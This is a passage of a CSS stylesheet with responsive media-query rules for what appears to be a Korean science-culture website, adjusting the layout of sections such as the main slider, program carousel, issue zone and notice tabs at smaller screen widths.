    margin: 0 auto;
    display: none;
  }
  .notice_wrap .sec-notice {
    width: 100%;
    position: relative;
  }
  .notice_wrap .sec_tabs .tab_inner {
    display: block;
  }


  .scip_wrap .scip_inner {
    width: 95%;
  }

  /* 전국의 과학문화 프로그램 */
  .scip_wrap .scip_inner { padding: 0; }
  .scip-item { margin-left: 10px; }
  /* // 전국의 과학문화 프로그램 */
  
}

@media all and (max-width:860px){


  /* 공통 */
  .sec_tit h2 { font-size: 1.5rem; }
  .inner_Body > section { padding-bottom: 6vw; }
  section .swiper-button-prev, section .swiper-button-next { 
    zoom: 70%;
  }

  /*메인*/
  .main_wrap .main_slide_inner .msWrap .stext .copy-head {
    font-size: 7vw;
  }
  .main_wrap .main_slide_inner .msWrap .stext .copy-body {
    width: 78%;
    font-size: 3vw;
    line-height: 1.6;
    word-break: keep-all;
    margin-top: 2vw;
  }
  .main_wrap .msWrap .utileBox {
    left: 7vw; bottom: 3vw;
  }
  .main_wrap .main_slide_inner .msWrap .stext .copy-body br {
    display: none;
  }

  .main_wrap .sc_inner .search_ver {width: 100%;}



/* 주요콘텐츠 */
  .data_wrap .sec_tit.sec_flex {
    display: block;
  }
  .data_wrap .sec_tit ul { right: 0; }
/* // 주요콘텐츠 */
/* 이슈존 */
.alert_zone {
  padding: 8vw 0;
}
.alert_zone .ar_inner {
  display: block;
  width: 92%;
}
.issue_zone { 
  padding: 7vw 4vw;
  margin-bottom: 10vw;
}
.alert_zone .ar_inner > div:not(:last-child) {  
  margin-bottom: 3vw;
}

/* //이슈존 */

}



@media all and (max-width:720px){

/* 소통마당 */
  .tcList ul {
    font-size: 0.975em;
}
.sec_tabs.tab1 .tcList {
  padding: 15px;
}
.sec_tabs.tab1 .tcList li { line-height: 45px; }
.sec_tabs.tab1 .tcSearch li { padding: 35px 15px; }
.sec_tabs.tab1 .tcSearch a {
  font-size: 18px;
  display: block;
  text-align: center;
  margin: 0 auto;
}
.sec_tabs.tab1 .tcSearch img {
  width: auto;
  height: 80px;
  display: block;
  margin: 0 auto;
}
  

}



@media all and (max-width:650px){

  /* 메인 */
  .main_wrap .mw_right .qlink { width: 70%; }
  .main_wrap .mw_right .qlink ul { grid-template-columns: repeat(3, 1fr); gap: 50px; }
  .main_wrap .mw_right .mw_banner { margin: 8px auto 8vw; }
  /* //메인 */

}


@media all and (max-width:560px){
  /*공통*/
  .sec_tit {
    display: block;
    margin-bottom: 30px;
  }
  .sec_tit h2 {
    margin-bottom: 2.5%;
  }
  .tab_wrap { 
    padding-top: 0;
  }

/* 메인 */

.main_wrap .mw_right .qlink ul {
  gap: 50px 14vw;
}

/* 메인 */

/* 전국의 과학문화 프로그램 */

.scip-item .swiper-slide .stext dl { padding: 4vw 2.7vw; min-height: 144px; }
.scip-item .swiper-slide .stext dt { font-size: 0.935rem; min-height: 46px;}
.scip-item .swiper-slide .stext dd { margin-top: 2vw; font-size: 0.8rem; }
.scip-item .swiper-slide .stext dd:has(span) { white-space: wrap; text-overflow: unset; margin-top: 3vw;}
.scip-item .swiper-slide .stext dd > span { font-size: 0.85rem; }

/* //전국의 과학문화 프로그램 */

/* 이슈존 */
.issue_zone .is_inner { min-width: 700px; gap: 4vw; }
.issue_zone .is_tit { padding-bottom: 20px; }
.issue_zone .is_tit h3 { font-size: 1.1rem; }
.issue_zone .is_tit h3 > button { top: -2px; font-size: 12px; }
.issue_zone .is_tit h3 + a { font-size: 0.6rem;}
.issue_zone .is_thumb { height: 230px; }
/* //이슈존 */


}

@media all and (max-width:480px){
  /* 메인 */
  .main_wrap .mw_right .qlink { width: 85%; }
  /* 메인// */
  /*알림마당*/
  .sec_tabs.tab1 .tcSearch a {
    display: flex;
    justify-content: center;
    gap: 5%;
  }
  .sec_tabs.tab1 .tcSearch img { margin: 0; }
  .commu_wrap .sec_tabs.tab1 .tcSearch ul {
    display: block;
  }
  .commu_wrap .sec_tabs.tab1 .tcSearch li { margin-top: 2.5%; }

  /* 알림존 */
  .alert_zone .utileBox h3 { margin-bottom: 7px; }
  .alert_zone .utileBox h3+span { 
    position: relative;
    top: 0;
    margin-bottom: 6px;
    display: block;
    font-size: 0.85rem;
   }
  .alert_zone .utileBox:has(span) { display: block; }

  /* // 알림존 */

}


